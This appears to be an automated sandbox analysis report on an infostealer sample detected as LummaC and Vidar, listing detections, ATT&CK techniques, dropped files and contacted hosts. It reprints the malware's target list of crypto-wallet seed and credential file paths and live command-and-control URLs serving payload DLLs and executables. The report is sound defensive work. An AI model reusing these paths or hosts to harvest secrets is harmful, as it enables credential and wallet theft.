                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Tries to harvest and steal Bitcoin Wallet information
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Yara matchFile source: 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2896, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Yara detected Vidar
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Yara detected Vidar stealer
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4960, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2896, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2B0C40 sqlite3_bind_zeroblob,2_2_6C2B0C40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2B0D60 sqlite3_bind_parameter_name,2_2_6C2B0D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1D8EA0 sqlite3_clear_bindings,2_2_6C1D8EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2B0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,2_2_6C2B0B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1D6410 bind,WSAGetLastError,2_2_6C1D6410

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		12
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API                		Boot or Logon Initialization Scripts511
                Process Injection                		11
                Deobfuscate/Decode Files or Information                		1
                Credentials in Registry                		1
                Account Discovery                		Remote Desktop Protocol4
                Data from Local System                		21
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)Logon Script (Windows)4
                Obfuscated Files or Information                		Security Account Manager4
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Screen Capture                		3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Software Packing                		NTDS55
                System Information Discovery                		Distributed Component Object Model2
                Clipboard Data                		124
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading                		Cached Domain Credentials41
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                Virtualization/Sandbox Evasion                		DCSync12
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job511
                Process Injection                		Proc Filesystem1
                System Owner/User Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501434 Sample: file.exe Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 56 traineiwnqo.shop 2->56 58 stadiatechnologies.com 2->58 60 2 other IPs or domains 2->60 80 Suricata IDS alerts for network traffic 2->80 82 Found malware configuration 2->82 84 Malicious sample detected (through community Yara rule) 2->84 86 11 other signatures 2->86 10 file.exe 2 2->10         started        signatures3 process4 file5 46 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 10->46 dropped 100 Contains functionality to inject code into remote processes 10->100 102 Writes to foreign memory regions 10->102 104 Allocates memory in foreign processes 10->104 106 Injects a PE file into a foreign processes 10->106 14 RegAsm.exe 1 252 10->14         started        19 conhost.exe 10->19         started        signatures6 process7 dnsIp8 66 stadiatechnologies.com 95.164.119.162, 49744, 80 VAKPoltavaUkraineUA Gibraltar 14->66 68 147.45.68.138, 49739, 49751, 80 FREE-NET-ASFREEnetEU Russian Federation 14->68 70 147.45.44.104, 49740, 80 FREE-NET-ASFREEnetEU Russian Federation 14->70 48 C:\Users\user\AppData\Local\...\sql[1].dll, PE32 14->48 dropped 50 C:\Users\user\AppData\...\softokn3[1].dll, PE32 14->50 dropped 52 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 14->52 dropped 54 14 other files (10 malicious) 14->54 dropped 72 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->72 74 Found many strings related to Crypto-Wallets (likely being stolen) 14->74 76 Tries to harvest and steal ftp login credentials 14->76 78 4 other signatures 14->78 21 KKJEBAAECB.exe 2 14->21         started        24 KJKJJJECFI.exe 2 14->24         started        26 cmd.exe 1 14->26         started        file9 signatures10 process11 signatures12 90 Multi AV Scanner detection for dropped file 21->90 92 Writes to foreign memory regions 21->92 94 Allocates memory in foreign processes 21->94 96 LummaC encrypted strings found 21->96 28 RegAsm.exe 21->28         started        31 conhost.exe 21->31         started        33 RegAsm.exe 21->33         started        98 Injects a PE file into a foreign processes 24->98 35 RegAsm.exe 189 24->35         started        38 conhost.exe 24->38         started        40 conhost.exe 26->40         started        42 timeout.exe 1 26->42         started        process13 dnsIp14 62 traineiwnqo.shop 188.114.96.3, 443, 49743, 49745 CLOUDFLARENETUS European Union 28->62 64 awwardwiqi.shop 188.114.97.3, 443, 49741, 49742 CLOUDFLARENETUS European Union 28->64 44 WerFault.exe 22 16 28->44         started        88 Tries to harvest and steal browser information (history, passwords, etc) 35->88 signatures15 process16

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe34%ReversingLabsWin32.Infostealer.Tinba

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\ProgramData\KJKJJJECFI.exe34%ReversingLabsWin32.Infostealer.Tinba
                C:\ProgramData\KKJEBAAECB.exe34%ReversingLabsWin32.Infostealer.Tinba
                C:\ProgramData\freebl3.dll0%ReversingLabs
                C:\ProgramData\mozglue.dll0%ReversingLabs
                C:\ProgramData\msvcp140.dll0%ReversingLabs
                C:\ProgramData\nss3.dll0%ReversingLabs
                C:\ProgramData\softokn3.dll0%ReversingLabs
                C:\ProgramData\vcruntime140.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd8fb6f7b_lgjfd[1].exe34%ReversingLabsWin32.Infostealer.Tinba
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd9a65b5d_vqwergf[1].exe34%ReversingLabsWin32.Infostealer.Tinba
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://ocsp.entrust.net020%URL Reputationsafe
                https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                http://crl.entrust.net/ts1ca.crl00%URL Reputationsafe
                http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                https://mozilla.org0/0%URL Reputationsafe
                https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%URL Reputationsafe
                http://www.entrust.net/rpa030%URL Reputationsafe
                http://aia.entrust.net/ts1-chain256.cer010%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                http://upx.sf.net0%URL Reputationsafe
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                condedqpwqm.shop100%Avira URL Cloudphishing
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                Http://147.45.68.138:80e0%Avira URL Cloudsafe
                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                https://support.mozilla.org0%URL Reputationsafe
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                https://steamcommunity.com/profiles/76561199761128941100%Avira URL Cloudmalware
                http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                https://www.entrust.net/rpa00%URL Reputationsafe
                http://147.45.68.138:808/20240%Avira URL Cloudsafe
                http://147.45.68.138/nss3.dll100%Avira URL Cloudmalware
                http://147.45.68.138/0%Avira URL Cloudsafe
                http://147.45.68.138/sql.dll100%Avira URL Cloudmalware
                http://stadiatechnologies.com/0%Avira URL Cloudsafe
                https://t.me/iyigunl100%Avira URL Cloudmalware
                http://147.45.68.138/p0%Avira URL Cloudsafe
                http://147.45.68.138/softokn3.dll100%Avira URL Cloudmalware
                stagedchheiqwo.shop100%Avira URL Cloudphishing
                http://147.45.68.138/u~0%Avira URL Cloudsafe
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe0%Avira URL Cloudsafe
                https://locatedblsoqp.shop/api100%Avira URL Cloudphishing
                stamppreewntnq.shop100%Avira URL Cloudphishing
                http://147.45.68.138/msvcp140.dll100%Avira URL Cloudmalware
                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                evoliutwoqm.shop0%Avira URL Cloudsafe
                https://awwardwiqi.shop/api100%Avira URL Cloudmalware
                http://147.45.68.138:80CA0%Avira URL Cloudsafe
                http://147.45.68.138:800%Avira URL Cloudsafe
                http://147.45.68.138:80form-data;0%Avira URL Cloudsafe
                http://stadiatechnologies.comntent-Disposition:0%Avira URL Cloudsafe
                http://147.45.68.138:80ocal0%Avira URL Cloudsafe
                http://147.45.68.138:80hellohttps://steamcommunity.com/profiles/76561199761128941b0%Avira URL Cloudsafe
                awwardwiqi.shop0%Avira URL Cloudsafe
                https://t.me/iyigunlsql.dllsqlr.dllIn0%Avira URL Cloudsafe
                http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exe100%Avira URL Cloudmalware
                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%Avira URL Cloudsafe
                http://147.45.68.138/vcruntime140.dll100%Avira URL Cloudmalware
                http://147.45.68.138/mozglue.dll%0%Avira URL Cloudsafe
                http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exe1kkkk1035441http://147.45.44.104/prog/66d0cd9a65b5d0%Avira URL Cloudsafe
                http://147.45.68.138/msvcp140.dll?100%Avira URL Cloudmalware
                http://147.45.68.138/(0%Avira URL Cloudsafe
                http://www.mozilla.com/en-US/blocklist/0%Avira URL Cloudsafe
                http://147.45.68.138/KEBGI0%Avira URL Cloudsafe
                https://traineiwnqo.shop/apibu100%Avira URL Cloudmalware
                http://stadiatechnologies.com0%Avira URL Cloudsafe
                http://147.45.68.138:80790dee73nt-Disposition:0%Avira URL Cloudsafe
                http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exe0%Avira URL Cloudsafe
                http://147.45.68.138/mozglue.dll100%Avira URL Cloudmalware
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%Avira URL Cloudsafe
                locatedblsoqp.shop100%Avira URL Cloudphishing
                caffegclasiqwp.shop100%Avira URL Cloudmalware
                http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exeorm-data;0%Avira URL Cloudsafe
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe0%Avira URL Cloudsafe
                millyscroqwp.shop100%Avira URL Cloudmalware
                http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exem-data;0%Avira URL Cloudsafe
                http://147.45.68.138/nss3.dll9b0%Avira URL Cloudsafe
                http://147.45.68.138:80AE0%Avira URL Cloudsafe
                http://147.45.68.138/nss3.dllhb0%Avira URL Cloudsafe
                http://147.45.68.138/b=0%Avira URL Cloudsafe
                http://147.45.68.138/sql.dllLbz0%Avira URL Cloudsafe
                https://traineiwnqo.shop/api100%Avira URL Cloudmalware
                http://147.45.68.138:80AFsrss.exe0%Avira URL Cloudsafe
                http://147.45.68.138/sql.dllurer0%Avira URL Cloudsafe
                http://64532127VdtSrezylanAPHTGetSystemInfoGetSystemTimeSleepkernel32.dllSymMatchStringInternetSetOp0%Avira URL Cloudsafe
                https://traineiwnqo.shop/100%Avira URL Cloudmalware
                http://147.45.68.138/G=6f0%Avira URL Cloudsafe
                http://147.45.68.138/freebl3.dll100%Avira URL Cloudmalware
                traineiwnqo.shop100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                locatedblsoqp.shop
                		188.114.97.3
                		truetrue
                  		unknown
                  awwardwiqi.shop
                  		188.114.97.3
                  		truetrue
                    		unknown
                    stadiatechnologies.com
                    		95.164.119.162
                    		truetrue
                      		unknown
                      traineiwnqo.shop
                      		188.114.96.3
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://147.45.68.138/nss3.dlltrue
                        • Avira URL Cloud: malware
                        		unknown
                        condedqpwqm.shoptrue
                        • Avira URL Cloud: phishing
                        		unknown
                        http://stadiatechnologies.com/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://147.45.68.138/true
                        • Avira URL Cloud: safe
                        		unknown
                        https://steamcommunity.com/profiles/76561199761128941true
                        • Avira URL Cloud: malware
                        		unknown
                        http://147.45.68.138/sql.dlltrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://147.45.68.138/softokn3.dlltrue
                        • Avira URL Cloud: malware
                        		unknown
                        stagedchheiqwo.shoptrue
                        • Avira URL Cloud: phishing
                        		unknown
                        https://locatedblsoqp.shop/apitrue
                        • Avira URL Cloud: phishing
                        		unknown
                        stamppreewntnq.shoptrue
                        • Avira URL Cloud: phishing
                        		unknown
                        evoliutwoqm.shoptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://awwardwiqi.shop/apitrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://147.45.68.138/msvcp140.dlltrue
                        • Avira URL Cloud: malware
                        		unknown
                        awwardwiqi.shoptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exefalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://147.45.68.138/vcruntime140.dlltrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://147.45.68.138/mozglue.dlltrue
                        • Avira URL Cloud: malware
                        		unknown
                        locatedblsoqp.shoptrue
                        • Avira URL Cloud: phishing
                        		unknown
                        caffegclasiqwp.shoptrue
                        • Avira URL Cloud: malware
                        		unknown
                        millyscroqwp.shoptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://traineiwnqo.shop/apitrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://147.45.68.138/freebl3.dlltrue
                        • Avira URL Cloud: malware
                        		unknown
                        traineiwnqo.shoptrue
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabAKFIDH.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFEBKJDB.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://t.me/iyigunlfile.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        Http://147.45.68.138:80eRegAsm.exe, 0000000C.00000002.2375283743.0000000000480000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/ac/?q=AKFIDH.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://ocsp.entrust.net03file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://ocsp.entrust.net02file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://147.45.68.138/pRegAsm.exe, 0000000C.00000002.2377742353.0000000001379000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=AKFIDH.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp, JEGHJD.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://147.45.68.138:808/2024RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmpfalse
